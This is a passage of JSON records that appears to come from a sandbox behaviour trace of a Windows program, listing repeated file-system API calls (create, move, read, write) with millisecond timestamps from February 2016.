"timestamp": "2016-02-16 17:41:42,543", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,553", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,563", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:42,563", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,573", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,583", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,593", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,603", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,613", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,623", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,633", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,643", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,653", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,663", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,684", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,704", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,714", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:42,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,774", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:42,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:42,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": 
